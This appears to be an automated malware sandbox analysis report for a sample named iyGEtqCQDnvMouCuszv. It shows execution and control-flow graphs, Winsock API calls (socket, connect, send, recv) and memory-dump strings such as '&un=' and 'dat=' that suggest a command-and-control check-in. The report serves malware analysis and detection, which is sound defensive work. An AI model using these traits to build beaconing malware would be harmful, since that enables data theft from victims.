                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                      • String ID:
                                                                                      • API String ID: 190613189-0
                                                                                      • Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                      • Instruction ID: eb4b2eb4961b7d09ea4a34ed08b3b50e56f073c3670a6d3e208c08a45fec6953
                                                                                      • Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
                                                                                      • Instruction Fuzzy Hash: 10F0F631204918FFD7029FA4DD0499FBBA8EF16350B2580BAE840FB211D674DE01AB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Execution Graph

                                                                                      Execution Coverage:3.1%
                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                      Signature Coverage:56.2%
                                                                                      Total number of Nodes:48
                                                                                      Total number of Limit Nodes:5
                                                                                      execution_graph 16112 fc9f58 16113 fc9f5d 16112->16113 16114 fc9ee9 16112->16114 16117 fc9e77 16114->16117 16119 fc946f 16114->16119 16118 fc946f 8 API calls 16117->16118 16123 fc958f 16117->16123 16118->16117 16120 fc94af 16119->16120 16121 fc9528 16120->16121 16127 fca32f 16120->16127 16121->16117 16124 fc9627 16123->16124 16125 fc95a5 16123->16125 16124->16117 16126 fca32f 8 API calls 16125->16126 16126->16124 16129 fca370 16127->16129 16128 fcaba8 16128->16120 16129->16128 16132 fca40b 16129->16132 16155 feadaf 16129->16155 16131 fca4ba 16131->16128 16135 fca52c 16131->16135 16158 feae7f 16131->16158 16132->16128 16132->16131 16134 fca49d getaddrinfo 16132->16134 16134->16131 16135->16128 16136 fca854 16135->16136 16143 fca6e9 16135->16143 16137 feaecf closesocket 16136->16137 16138 fca86e 16137->16138 16138->16120 16139 fca7e5 16140 feaecf closesocket 16139->16140 16144 fca7ff 16140->16144 16141 fcaa07 16145 feaecf closesocket 16141->16145 16143->16139 16154 fca899 16143->16154 16144->16120 16146 fcaa43 16145->16146 16146->16120 16148 fca9b8 16149 fcaad7 setsockopt recv 16148->16149 16151 fca9e6 16148->16151 16150 fcab39 16149->16150 16149->16151 16150->16151 16152 fcab42 recv 16150->16152 16164 feaecf 16151->16164 16152->16150 16152->16151 16153 fca93c 16161 feae2f 16153->16161 16154->16141 16154->16153 16156 feadc9 16155->16156 16157 feadd8 socket 16156->16157 16157->16132 16159 feae9c 16158->16159 16160 feaeab connect 16159->16160 16160->16135 16162 feae49 16161->16162 16163 feae58 send 16162->16163 16163->16148 16165 feaeec 16164->16165 16166 feaefb closesocket 16165->16166 16166->16128

                                                                                      Executed Functions

                                                                                      Function 00FCA32F Relevance: 14.6, APIs: 4, Strings: 4, Instructions: 646COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 fca32f-fca36e 1 fca389-fca38b 0->1 2 fca370-fca373 0->2 4 fcabd1-fcabd6 1->4 5 fca391-fca398 1->5 2->1 3 fca375-fca378 2->3 3->1 6 fca37a-fca37d 3->6 7 fca39e-fca3ac 5->7 8 fcabd0 5->8 6->1 9 fca37f-fca382 6->9 10 fca3ae-fca3b1 7->10 11 fca3b3 7->11 8->4 9->1 12 fca384-fca387 9->12 10->11 13 fca3b9-fca3c1 10->13 11->13 12->1 12->5 14 fca3d1-fca3d4 13->14 15 fca3c3-fca3c6 13->15 16 fca3dc-fca3f3 14->16 18 fca3d6 14->18 15->16 17 fca3c8-fca3cf 15->17 19 fca3fa-fca406 call feadaf 16->19 20 fca3f5-fca3f8 16->20 17->18 18->16 23 fca40b-fca42a 19->23 20->19 21 fca430-fca434 20->21 24 fca4c8-fca4d3 21->24 25 fca43a-fca441 21->25 23->8 23->21 24->8 26 fca4d9-fca4e1 24->26 27 fca46e-fca47d 25->27 28 fca443-fca468 call fc6cdf call fe621f 25->28 29 fca4fb-fca50a 26->29 30 fca4e3-fca4f4 call fead6f 26->30 27->8 32 fca483-fca487 27->32 28->27 34 fca50c-fca527 call feae7f 29->34 35 fca56b-fca580 29->35 30->29 32->8 37 fca48d-fca48f 32->37 45 fca52c-fca554 34->45 41 fca59e-fca5a1 35->41 42 fca582-fca59c call fec6af 35->42 37->8 43 fca495-fca497 37->43 41->8 44 fca5a7-fca5aa 41->44 53 fca5da-fca5df call fec6af 42->53 43->8 48 fca49d-fca4b8 getaddrinfo 43->48 44->8 50 fca5b0-fca5b3 44->50 45->35 51 fca556-fca561 45->51 48->24 49 fca4ba-fca4c0 48->49 49->24 54 fca5ba-fca5d9 call fec6af 50->54 55 fca5b5-fca5b8 50->55 51->8 56 fca567 51->56 57 fca5e2-fca696 call fec67f call fd969f call fd968f * 2 call fec67f call fd8f8f call fec87f 53->57 54->53 55->54 55->57 56->35 76 fca698-fca69b 57->76 77 fca6b3-fca6da 57->77 76->77 78 fca69d-fca6b0 call fd945f 76->78 79 fca82a-fca84e call fcbabf 77->79 80 fca6e0-fca6e3 77->80 78->77 89 fca7a9-fca7af 79->89 90 fca854-fca898 call feaecf 79->90 80->79 83 fca6e9-fca70c 80->83 84 fca70e 83->84 85 fca712-fca7a6 call fec9af * 3 call fec87f * 2 call fd968f * 2 83->85 84->85 85->89 92 fca7b5-fca7b8 89->92 93 fca9f2-fcaa05 call fec87f 89->93 92->93 96 fca7be-fca7df call fcbadf 92->96 104 fca98d-fca9bd call fc68ff call feae2f 93->104 105 fcaa07 93->105 108 fca899-fca916 call fec87f call fec67f call fec87f call fd8f8f call fec87f * 3 96->108 109 fca7e5-fca829 call feaecf 96->109 126 fcaa5e 104->126 127 fca9c3-fca9d8 104->127 110 fcaa0c-fcaa5d call fc68ff call fe7c4f call feaecf 105->110 168 fca918-fca92f call fec87f call fec67f 108->168 169 fca932-fca936 108->169 133 fcaa61-fcaa64 126->133 127->126 131 fca9de-fca9e4 127->131 131->133 135 fca9e6 131->135 137 fcaa66-fcaa69 133->137 138 fcaa77-fcaa94 133->138 147 fca9ed 135->147 141 fcab8e-fcaba3 call feaecf 137->141 142 fcaa6f-fcaa71 137->142 143 fcaaa6-fcab37 call fec6af call fec67f setsockopt recv 138->143 144 fcaa96-fcaaa0 138->144 152 fcaba8-fcabcf 141->152 142->138 142->141 159 fcab39 143->159 160 fcab7a-fcab88 143->160 144->141 144->143 147->141 152->8 159->160 162 fcab3b-fcab40 159->162 160->141 162->160 164 fcab42-fcab78 recv 162->164 164->159 164->160 168->169 171 fca93c-fca94c 169->171 172 fcaa09 169->172 174 fca96c-fca96f 171->174 175 fca94e-fca954 171->175 172->110 178 fca974-fca97a 174->178 175->174 177 fca956-fca96a 175->177 177->178 180 fca97c-fca982 178->180 181 fca98a 178->181 180->181 182 fca984 180->182 181->104 182->181
                                                                                      APIs
                                                                                      • getaddrinfo.WS2_32(?,00003038,?,00000000), ref: 00FCA4B4
                                                                                        • Part of subcall function 00FEAECF: closesocket.WS2_32(00FCABA8,00000000,?,?,00FCABA8,?,?), ref: 00FEAF04
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocketgetaddrinfo
                                                                                      • String ID: &br=9$&un=$80$dat=
                                                                                      • API String ID: 1380972459-3709368510
                                                                                      • Opcode ID: 03f8ce8572b942c285e0f260c1858f741c5aefd839cb9d0c57a1ee46e63bdf82
                                                                                      • Instruction ID: b18b989de1564b287ff1cec8d3f591b8e5f0c4a6a9874697a7294d3800294f41
                                                                                      • Opcode Fuzzy Hash: 03f8ce8572b942c285e0f260c1858f741c5aefd839cb9d0c57a1ee46e63bdf82
                                                                                      • Instruction Fuzzy Hash: A142A3B1D0030AAFDB24DFA4C985FEE73B5AF48304F14462EE5199B242E734B945DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FD50FF Relevance: 1.6, Strings: 1, Instructions: 359COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: wininet.dll
                                                                                      • API String ID: 0-3354682871
                                                                                      • Opcode ID: daf53c424aa2c196754768a01107e07183c0bef7d118568a5b9ccaf745aa9112
                                                                                      • Instruction ID: b74e3bbfeac92037dfce0eb13942a9b503f12060366bea3d8a5aae4deba7778e
                                                                                      • Opcode Fuzzy Hash: daf53c424aa2c196754768a01107e07183c0bef7d118568a5b9ccaf745aa9112
                                                                                      • Instruction Fuzzy Hash: A7C1E4B1A447447AE720EBB4CD47FEBB3EDAF04700F14451EF259E6181E7B86A009B65
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FC9468 Relevance: .1, Instructions: 97COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 602 fc9468-fc94a9 603 fc94af-fc94b3 602->603 604 fc9519-fc9526 603->604 605 fc94b5-fc94b8 603->605 604->603 607 fc9528-fc9533 604->607 605->604 606 fc94ba-fc94d7 call fec6af call fec67f 605->606 619 fc94dc-fc94fd call fca32f 606->619 609 fc9568-fc956b 607->609 610 fc9535-fc953c 607->610 611 fc956d-fc9575 609->611 612 fc9586-fc958d 609->612 614 fc953e-fc9546 610->614 615 fc9562 610->615 611->612 616 fc9577-fc9580 611->616 618 fc954f-fc9560 614->618 615->609 616->612 618->615 618->618 621 fc9502-fc950d 619->621 622 fc950f 621->622 623 fc9516 621->623 622->623 623->604
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 08dfd1d386aba284fe2ceba3d4fe55a5abeffbbf90617dcbad19d8dc3e16f93f
                                                                                      • Instruction ID: fa2dc1bf2f79624cabcf72c1299533d3db3ed00c6a254e2f8f4615a05f80e47a
                                                                                      • Opcode Fuzzy Hash: 08dfd1d386aba284fe2ceba3d4fe55a5abeffbbf90617dcbad19d8dc3e16f93f
                                                                                      • Instruction Fuzzy Hash: 8931E4B0905206EFD715CF14C985FEAB7F8FB44354F18447DE8099B282C771AA41DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FC946F Relevance: .1, Instructions: 95COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 624 fc946f-fc94a9 625 fc94af-fc94b3 624->625 626 fc9519-fc9526 625->626 627 fc94b5-fc94b8 625->627 626->625 629 fc9528-fc9533 626->629 627->626 628 fc94ba-fc950d call fec6af call fec67f call fca32f 627->628 644 fc950f 628->644 645 fc9516 628->645 631 fc9568-fc956b 629->631 632 fc9535-fc953c 629->632 633 fc956d-fc9575 631->633 634 fc9586-fc958d 631->634 636 fc953e-fc9546 632->636 637 fc9562 632->637 633->634 638 fc9577-fc9580 633->638 640 fc954f-fc9560 636->640 637->631 638->634 640->637 640->640 644->645 645->626
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2ee643b693398b86ab8ceb69b4505702790a8cf711abf2c03d681e3014912ab1
                                                                                      • Instruction ID: 626a1d607a751ffde41d3d60fe96b99f03a9f64aa0642c4c6c767d0119d037d6
                                                                                      • Opcode Fuzzy Hash: 2ee643b693398b86ab8ceb69b4505702790a8cf711abf2c03d681e3014912ab1
                                                                                      • Instruction Fuzzy Hash: 4531D4B0901206EFD715DF14C985FAAB3F8FB44354F18457DE8099B282C771AA41DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FCA32A Relevance: 9.1, APIs: 1, Strings: 4, Instructions: 357COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 183 fca32a-fca36e 184 fca389-fca38b 183->184 185 fca370-fca373 183->185 187 fcabd1-fcabd6 184->187 188 fca391-fca398 184->188 185->184 186 fca375-fca378 185->186 186->184 189 fca37a-fca37d 186->189 190 fca39e-fca3ac 188->190 191 fcabd0 188->191 189->184 192 fca37f-fca382 189->192 193 fca3ae-fca3b1 190->193 194 fca3b3 190->194 191->187 192->184 195 fca384-fca387 192->195 193->194 196 fca3b9-fca3c1 193->196 194->196 195->184 195->188 197 fca3d1-fca3d4 196->197 198 fca3c3-fca3c6 196->198 199 fca3dc-fca3f3 197->199 201 fca3d6 197->201 198->199 200 fca3c8-fca3cf 198->200 202 fca3fa-fca42a call feadaf 199->202 203 fca3f5-fca3f8 199->203 200->201 201->199 202->191 204 fca430-fca434 202->204 203->202 203->204 207 fca4c8-fca4d3 204->207 208 fca43a-fca441 204->208 207->191 209 fca4d9-fca4e1 207->209 210 fca46e-fca47d 208->210 211 fca443-fca468 call fc6cdf call fe621f 208->211 212 fca4fb-fca50a 209->212 213 fca4e3-fca4f4 call fead6f 209->213 210->191 215 fca483-fca487 210->215 211->210 217 fca50c-fca554 call feae7f 212->217 218 fca56b-fca580 212->218 213->212 215->191 220 fca48d-fca48f 215->220 217->218 234 fca556-fca561 217->234 224 fca59e-fca5a1 218->224 225 fca582-fca59c call fec6af 218->225 220->191 226 fca495-fca497 220->226 224->191 227 fca5a7-fca5aa 224->227 236 fca5da-fca5df call fec6af 225->236 226->191 231 fca49d-fca4b8 getaddrinfo 226->231 227->191 233 fca5b0-fca5b3 227->233 231->207 232 fca4ba-fca4c0 231->232 232->207 237 fca5ba-fca5d9 call fec6af 233->237 238 fca5b5-fca5b8 233->238 234->191 239 fca567 234->239 240 fca5e2-fca696 call fec67f call fd969f call fd968f * 2 call fec67f call fd8f8f call fec87f 236->240 237->236 238->237 238->240 239->218 259 fca698-fca69b 240->259 260 fca6b3-fca6da 240->260 259->260 261 fca69d-fca6b0 call fd945f 259->261 262 fca82a-fca84e call fcbabf 260->262 263 fca6e0-fca6e3 260->263 261->260 272 fca7a9-fca7af 262->272 273 fca854-fca898 call feaecf 262->273 263->262 266 fca6e9-fca70c 263->266 267 fca70e 266->267 268 fca712-fca7a6 call fec9af * 3 call fec87f * 2 call fd968f * 2 266->268 267->268 268->272 275 fca7b5-fca7b8 272->275 276 fca9f2-fcaa05 call fec87f 272->276 275->276 279 fca7be-fca7df call fcbadf 275->279 287 fca98d-fca9bd call fc68ff call feae2f 276->287 288 fcaa07 276->288 291 fca899-fca916 call fec87f call fec67f call fec87f call fd8f8f call fec87f * 3 279->291 292 fca7e5-fca829 call feaecf 279->292 309 fcaa5e 287->309 310 fca9c3-fca9d8 287->310 293 fcaa0c-fcaa5d call fc68ff call fe7c4f call feaecf 288->293 351 fca918-fca92f call fec87f call fec67f 291->351 352 fca932-fca936 291->352 316 fcaa61-fcaa64 309->316 310->309 314 fca9de-fca9e4 310->314 314->316 318 fca9e6-fca9ed 314->318 320 fcaa66-fcaa69 316->320 321 fcaa77-fcaa94 316->321 324 fcab8e-fcabcf call feaecf 318->324 320->324 325 fcaa6f-fcaa71 320->325 326 fcaaa6-fcab37 call fec6af call fec67f setsockopt recv 321->326 327 fcaa96-fcaaa0 321->327 324->191 325->321 325->324 342 fcab39 326->342 343 fcab7a-fcab88 326->343 327->324 327->326 342->343 345 fcab3b-fcab40 342->345 343->324 345->343 347 fcab42-fcab78 recv 345->347 347->342 347->343 351->352 354 fca93c-fca94c 352->354 355 fcaa09 352->355 357 fca96c-fca96f 354->357 358 fca94e-fca954 354->358 355->293 361 fca974-fca97a 357->361 358->357 360 fca956-fca96a 358->360 360->361 363 fca97c-fca982 361->363 364 fca98a 361->364 363->364 365 fca984 363->365 364->287 365->364
                                                                                      APIs
                                                                                      • getaddrinfo.WS2_32(?,00003038,?,00000000), ref: 00FCA4B4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: getaddrinfo
                                                                                      • String ID: &br=9$&un=$80$dat=
                                                                                      • API String ID: 300660673-3709368510
                                                                                      • Opcode ID: d21bb3b0aa3043bef178344d2777cb4d30962b50e9bd6d4cace37643bad55bf1
                                                                                      • Instruction ID: 968c4fa578620b523a08d1defd76d5a6cdb77903175ff7f443490b852add720d
                                                                                      • Opcode Fuzzy Hash: d21bb3b0aa3043bef178344d2777cb4d30962b50e9bd6d4cace37643bad55bf1
                                                                                      • Instruction Fuzzy Hash: 3AE1B2B0D0034A9FDB28DFA4C985FEE77B6AF44314F14861EE4199B241E374B905DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FEAE2F Relevance: 1.5, APIs: 1, Instructions: 30networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 489 feae2f-feae72 call fc6d6f call feb8df send
                                                                                      APIs
                                                                                      • send.WS2_32(00000000,00000000,?,?,?,?,00000000,00000000,?,00009FFA), ref: 00FEAE6D
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: send
                                                                                      • String ID:
                                                                                      • API String ID: 2809346765-0
                                                                                      • Opcode ID: 4172edb16a4c742ef59d4ceb39d1d87b9fac2e8ab9975d157d0b6f458ea94e4d
                                                                                      • Instruction ID: 700693c9feb87625494a36a1b13ea489fd8aa133bba95b0cd466706011b6c8be
                                                                                      • Opcode Fuzzy Hash: 4172edb16a4c742ef59d4ceb39d1d87b9fac2e8ab9975d157d0b6f458ea94e4d
                                                                                      • Instruction Fuzzy Hash: E6E032B6200609BBDA14EE9ADC42EEB77ADEFC8310F008409F908A3201C635BD118BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FEADAF Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 494 feadaf-feadee call fc6d6f call feb8df socket
                                                                                      APIs
                                                                                      • socket.WS2_32(?,00000006,00000001,00000002,00000001,00000006,?,?,?), ref: 00FEADE9
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: socket
                                                                                      • String ID:
                                                                                      • API String ID: 98920635-0
                                                                                      • Opcode ID: a05225648e8802b157ab835291fd0fe7c601450b7227633575244b5490f42542
                                                                                      • Instruction ID: c71c57473f6cb3824791b2d3a0721a5e4f9bf92abe3b6f618b68c9ee0bea9f56
                                                                                      • Opcode Fuzzy Hash: a05225648e8802b157ab835291fd0fe7c601450b7227633575244b5490f42542
                                                                                      • Instruction Fuzzy Hash: B7E09A72600208BFCA10EE99DC45DDB73ADEFC8310B004409FD09A7201C634BE118BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FEAE7F Relevance: 1.5, APIs: 1, Instructions: 28networkCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 499 feae7f-feaec1 call fc6d6f call feb8df connect
                                                                                      APIs
                                                                                      • connect.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00FEAEBC
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: connect
                                                                                      • String ID:
                                                                                      • API String ID: 1959786783-0
                                                                                      • Opcode ID: d26fa255dcaac93edc731f10702dae1ce39af8382611534a015bfcb816758a3c
                                                                                      • Instruction ID: 2dc986a878c77c01650d9ea08402e33d9eed76c77b73277a732f6b0296def4ef
                                                                                      • Opcode Fuzzy Hash: d26fa255dcaac93edc731f10702dae1ce39af8382611534a015bfcb816758a3c
                                                                                      • Instruction Fuzzy Hash: 2CE09A72200308BFDA14EF99DC46CDB33ADEFC9310B004419F908A3201C630BE108BB1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FEAECF Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 504 feaecf-feaf09 call fc6d6f call feb8df closesocket
                                                                                      APIs
                                                                                      • closesocket.WS2_32(00FCABA8,00000000,?,?,00FCABA8,?,?), ref: 00FEAF04
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: closesocket
                                                                                      • String ID:
                                                                                      • API String ID: 2781271927-0
                                                                                      • Opcode ID: 0983c183679227790382b5d31dd3e8d8e86cda366afc7315b16c8a92912a6723
                                                                                      • Instruction ID: 1ef2ed4c2a955debded71054ce2f3b69bb888745bc28292391767ae48993c20b
                                                                                      • Opcode Fuzzy Hash: 0983c183679227790382b5d31dd3e8d8e86cda366afc7315b16c8a92912a6723
                                                                                      • Instruction Fuzzy Hash: 08E08C322006087BC620FA9ACC01CDB77AEDFC5310B00841AFA09AB201C671BA1287F1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Non-executed Functions

                                                                                      Function 00FCF26F Relevance: 42.9, Strings: 34, Instructions: 447COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: `$!$!*$#F$($+]$,$/;$0$0}$2'$3q$5$8m$?$Ee$Jk$NO$ON$P$]g$`$`G$`l$g$ku$qQ$r-$s$s$s8$vr$~$R
                                                                                      • API String ID: 0-1562232700
                                                                                      • Opcode ID: f7c6343ada00241373b85ca07c6f56630a4f546417c823147a89f5fc4852dd85
                                                                                      • Instruction ID: d267ae1b7c221c57ad0c40a97be0f62c291385026a3a402641a77ca6d7b1f7d9
                                                                                      • Opcode Fuzzy Hash: f7c6343ada00241373b85ca07c6f56630a4f546417c823147a89f5fc4852dd85
                                                                                      • Instruction Fuzzy Hash: AE428BB0D05229CBEB64CF44CA99BDDFBB2BB45308F2081D9C5496B285C7B95AC9DF40
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FD708F Relevance: 1.6, Strings: 1, Instructions: 398COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?
                                                                                      • API String ID: 0-1684325040
                                                                                      • Opcode ID: 8a1ac5076f338c06c1f1fbcfabb60cd2befa89910fc18e8b8a6d757465b4d3ae
                                                                                      • Instruction ID: 4f31359e6dc6c91c2284e695b14ec4659c93460d8c401702a58302d165582937
                                                                                      • Opcode Fuzzy Hash: 8a1ac5076f338c06c1f1fbcfabb60cd2befa89910fc18e8b8a6d757465b4d3ae
                                                                                      • Instruction Fuzzy Hash: 79E1B6B1D04318ABDB15EFA4CC81BEFB7B9BF44300F18415AF509AA241EB745B45DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FC9F5F Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: =
                                                                                      • API String ID: 0-2322244508
                                                                                      • Opcode ID: e7ccc4f1ae3cfc49b6485787f80922a506e7c5073bde8c0114605eac1b0891a2
                                                                                      • Instruction ID: dca981164bbc8750dd9d997c970361c8d5852a1be504fd41312c26fc3dad3dd6
                                                                                      • Opcode Fuzzy Hash: e7ccc4f1ae3cfc49b6485787f80922a506e7c5073bde8c0114605eac1b0891a2
                                                                                      • Instruction Fuzzy Hash: B291E5719043486BCB11EBE5CC86FEEB7B9BF45300F04456EB50DAB182E778A644DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FD708E Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: ?
                                                                                      • API String ID: 0-1684325040
                                                                                      • Opcode ID: f7cd7a2b7d99ffda1985dd26a26c628036198f3272dff8f2d86cb79384caefe5
                                                                                      • Instruction ID: f68075e14e5a70da657a5d33f6342eff1c5d4a8071483526b9142394ff664e90
                                                                                      • Opcode Fuzzy Hash: f7cd7a2b7d99ffda1985dd26a26c628036198f3272dff8f2d86cb79384caefe5
                                                                                      • Instruction Fuzzy Hash: 8A71A3B1C00358ABDB25EFA5CC42FEFB779AF84300F08455AF509A6241EB345B45DBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00FC9548 Relevance: .0, Instructions: 24COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.5793557342.0000000000FA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_fa0000_iyGEtqCQDnvMouCuszv.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 549f992583639052fb82d7810b949de2dcb1d4915aa8a88e7564a5c74c47e26c
                                                                                      • Instruction ID: aed827fe1d1fc3dd90a59241c8d841e9d8c96e72f8dc230a319a416a457774c2
                                                                                      • Opcode Fuzzy Hash: 549f992583639052fb82d7810b949de2dcb1d4915aa8a88e7564a5c74c47e26c
                                                                                      • Instruction Fuzzy Hash: 5AE09A71E062028FC725CF05E509BA0F7E0FB81322F0894BAC8085B251E37284108B88
